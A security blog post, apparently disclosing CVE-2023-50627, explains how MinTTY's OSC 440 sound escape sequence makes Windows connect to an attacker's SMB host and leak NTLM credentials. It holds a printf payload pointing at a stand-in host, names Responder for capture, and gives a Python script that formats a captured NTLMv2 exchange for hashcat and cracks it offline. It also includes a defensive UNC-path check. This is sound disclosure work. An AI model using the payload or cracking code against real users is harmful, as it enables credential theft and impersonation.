stat - a menace. Maybe not to us folks in Linuxembourg, but to the citizens of Windonesia - traitorous.

Novice bug bounty hunters (like myself), here's a tip for you. On Windows, accessing a file at an attacker-controlled path, even just stat'ing it, can leak sensitive information.

How so?

Windows Network Shares

Network shares are a fairly popular feature of Windows, especially in organizations. If you’ve used one before, you probably did so using its UNC path or a mapped network drive (which is mapped to its UNC path…). A UNC path to a network location usually looks something like this:
\\host\share\file.log.

But what you probably didn't think about while using them is authentication. If you have used one in an organization, you may never have had to authenticate at all. How does that work?

Upon accessing the share, the Windows SMB client automatically negotiates an authentication mechanism with the server (I won't get into it, look up SPNEGO for the details).
Once a mechanism is chosen, Windows also authenticates automatically with the logged-on user's credentials, if the mechanism supports it (I won't get into it, look up Kerberos and NTLM for the details). Kerberos only works for hosts the domain controller knows about; for anything else, such as a host outside the domain or one addressed by IP, the client falls back to NTLM unless policy forbids it.

If an attacker can cause an app to access a network path on an attacker-controlled host, they can steer the negotiation towards the mechanism they want (in practice NTLM) and capture the authentication token. For NTLM that token is a challenge-response derived from the user's password hash: it can be relayed to another service that does not enforce signing in order to impersonate the victim's Windows user, or cracked offline to recover the password if it is weak.
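The check an application should make before touching a path it did not choose itself, as an added example of my own (not MinTTY's fix and not code from the post). It recognises the forward-slash form that cygwin-style programs translate to a UNC path, the \\?\UNC\ long-path form, and the local device namespaces that look similar but stay on the machine; is_network_drive asks Win32 GetDriveTypeW about mapped drive letters and, as an assumption for portability, answers "no" on anything but Windows. Function names and the sample paths are mine.

```python
import os
import sys


def is_unc_path(path: str) -> bool:
    r"""True if merely stat()ing `path` would make Windows connect to a remote host.

    Accepts both separators (cygwin/msys translate //host/share to \\host\share),
    the \\?\UNC\host\share long-path form, and treats the local device namespaces
    \\?\C:\... and \\.\pipe\... as local.
    """
    p = path.replace("/", "\\")
    if not p.startswith("\\\\"):
        return False                        # drive or relative path
    rest = p[2:]
    if rest[:2] in ("?\\", ".\\"):
        if rest[2:6].upper() != "UNC\\":
            return False                    # \\?\C:\x, \\.\pipe\x, \\?\GLOBALROOT\...
        rest = rest[6:]
    host = rest.split("\\", 1)[0]
    return host != ""


def is_network_drive(path: str) -> bool:
    r"""Mapped drives (Z:\) hide a UNC path behind a letter, so ask the OS (Windows only)."""
    if sys.platform != "win32":
        return False                        # assumption: no drive mappings elsewhere
    import ctypes
    root = os.path.splitdrive(os.path.abspath(path))[0] + "\\"
    return ctypes.windll.kernel32.GetDriveTypeW(root) == 4   # DRIVE_REMOTE


def safe_to_touch(path: str) -> bool:
    """Policy a terminal or CLI could apply to file names taken from untrusted output."""
    return not (is_unc_path(path) or is_network_drive(path))


if __name__ == "__main__":
    # Constructed inputs; the first has the shape of path an escape sequence would carry.
    for p in ("//leakmyhash.invalid/sounds/silent.wav", r"\\?\UNC\srv\share\x.wav",
              r"\\?\C:\Windows\Media\tada.wav", r"C:\Windows\Media\tada.wav"):
        print("BLOCK" if not safe_to_touch(p) else "ok   ", p)
```

The string check alone is not enough on Windows: a file name like Z:\x.wav is local-looking but may be a mapped share, which is why the drive type is queried as well.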

CVE-2023-50627

MinTTY is a fairly common terminal emulator. Most people know it from Git Bash for Windows.

MinTTY was vulnerable to exactly what I've described above, through escape sequences. I've discussed what terminal escape sequences are in a previous post.

In a manner similar to what I've discussed in my post about npm, gh cli and radare2, an attacker only needs to get the terminal to print an escape sequence such as the following. OSC 440 asks MinTTY to play a sound file, and a //host/... path is resolved as the UNC path \\host\..., so the terminal connects to the attacker's host:

printf '\x1b]440;//leakmyhash.invalid/sounds/silent.wav:async\007'

Then, with a tool such as Responder or impacket's smbserver.py listening on that host, the authentication token is captured: for NTLM this is the NetNTLMv2 challenge-response, which Responder prints in a form hashcat can crack directly.
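To make the captured "token" concrete, here is an added example of my own, not code from the post, MinTTY, Responder or impacket. It builds a constructed NTLMv2 exchange for a hypothetical user alice in domain CORP with a deliberately weak password, parses the CHALLENGE/AUTHENTICATE pair the way a capture tool would, emits it as a hashcat -m 5600 line, and then recovers the password from a tiny wordlist, which is the "weak / hash-crackable" case described above. Every name, challenge and credential is constructed for the example; the message layouts follow MS-NLMP, and MD4 is implemented inline because hashlib often lacks it on OpenSSL 3.

```python
import hmac
import struct
from hashlib import md5
MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing on OpenSSL 3."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = rol((a + fn(b, c, d) + X[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def ntowf_v2(user: str, domain: str, password: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over UPPER(user)+domain."""
    return hmac.new(md4(password.encode("utf-16-le")), (user.upper() + domain).encode("utf-16-le"), md5).digest()

def ntlmv2_response(user, domain, password, server_chal, client_chal, timestamp, target_info):
    """NtChallengeResponse = NTProofStr || temp, the blob the client puts in AUTHENTICATE."""
    temp = b"\x01\x01" + b"\x00" * 6 + timestamp + client_chal + b"\x00" * 4 + target_info + b"\x00" * 4
    return hmac.new(ntowf_v2(user, domain, password), server_chal + temp, md5).digest() + temp

def build_challenge(target: str, server_chal: bytes, target_info: bytes) -> bytes:
    """CHALLENGE_MESSAGE (type 2) as the attacker's SMB server sends it; 56-byte header."""
    tn = target.encode("utf-16-le")
    return (b"NTLMSSP\x00" + struct.pack("<I", 2) + struct.pack("<HHI", len(tn), len(tn), 56)
            + struct.pack("<I", 0x02080201) + server_chal + b"\x00" * 8   # flags, challenge, reserved
            + struct.pack("<HHI", len(target_info), len(target_info), 56 + len(tn))
            + b"\x00" * 8 + tn + target_info)                              # version, then payload

def build_authenticate(domain: str, user: str, workstation: str, nt_resp: bytes) -> bytes:
    """AUTHENTICATE_MESSAGE (type 3) as the victim's SMB client sends it; 88-byte header."""
    chunks = [b"", nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"),
              workstation.encode("utf-16-le"), b""]   # LM, NT, Domain, User, Workstation, SessionKey
    descs, payload, off = b"", b"", 88
    for ch in chunks:                                  # (Len, MaxLen, Offset) per field
        descs += struct.pack("<HHI", len(ch), len(ch), off)
        payload, off = payload + ch, off + len(ch)
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + descs + struct.pack("<I", 0x02080201)
            + b"\x00" * 24 + payload)                  # version + MIC zeroed, then payload

def _field(msg: bytes, pos: int) -> bytes:
    ln, _maxlen, off = struct.unpack_from("<HHI", msg, pos)
    return msg[off:off + ln]

def netntlmv2_hashcat(challenge_msg: bytes, auth_msg: bytes) -> str:
    """Turn a captured CHALLENGE/AUTHENTICATE pair into a hashcat -m 5600 line."""
    if challenge_msg[:12] != b"NTLMSSP\x00\x02\x00\x00\x00" or auth_msg[:12] != b"NTLMSSP\x00\x03\x00\x00\x00":
        raise ValueError("not an NTLM CHALLENGE/AUTHENTICATE pair")
    nt_resp = _field(auth_msg, 20)
    if len(nt_resp) <= 24:
        raise ValueError("NTLMv1 response: use hashcat -m 5500 instead")
    user, domain = (_field(auth_msg, p).decode("utf-16-le") for p in (36, 28))
    return ":".join([user, "", domain, challenge_msg[24:32].hex(), nt_resp[:16].hex(), nt_resp[16:].hex()])

def crack_netntlmv2(line: str, wordlist):
    """Offline guessing: recompute NTProofStr per candidate; a match reveals the password."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal, blob = bytes.fromhex(chal), bytes.fromhex(blob)
    for pw in wordlist:
        guess = hmac.new(ntowf_v2(user, domain, pw), chal + blob, md5).hexdigest()
        if hmac.compare_digest(guess, proof):
            return pw
    return None

# Constructed victim, challenges and target info; none of this is real data.
VICTIM = ("alice", "CORP", "Winter2023!")
SERVER_CHALLENGE, CLIENT_CHALLENGE = bytes.fromhex("0123456789abcdef"), bytes.fromhex("fedcba9876543210")
TIMESTAMP = struct.pack("<Q", 133_000_000_000_000_000)                              # FILETIME
TARGET_INFO = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le") + b"\x00" * 4   # NbDomainName, EOL

def simulate_capture() -> str:
    """Stand-in for what the listener logs when the victim's terminal stat()s the share."""
    user, domain, password = VICTIM
    chal = build_challenge("ATTACKER", SERVER_CHALLENGE, TARGET_INFO)
    resp = ntlmv2_response(user, domain, password, SERVER_CHALLENGE, CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    return netntlmv2_hashcat(chal, build_authenticate(domain, user, "VICTIM-PC", resp))

if __name__ == "__main__":
    captured = simulate_capture()
    print(captured, "\ncracked:", crack_netntlmv2(captured, ["Password1", "Summer2023!", "Winter2023!"]))
```

The line printed first has the same shape Responder writes to its logs and hashcat -m 5600 consumes directly. The guess loop succeeds only because the password is in the wordlist; with a strong password the attacker is left with relaying the exchange, which needs no cracking at all but does need a target that does not enforce signing.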

A recent patch following my report, released in version 3.7.0, mitigates this attack.
I would like to thank the maintainers for their cooperative spirit during the reporting process. They accept donations. Visit their website for details.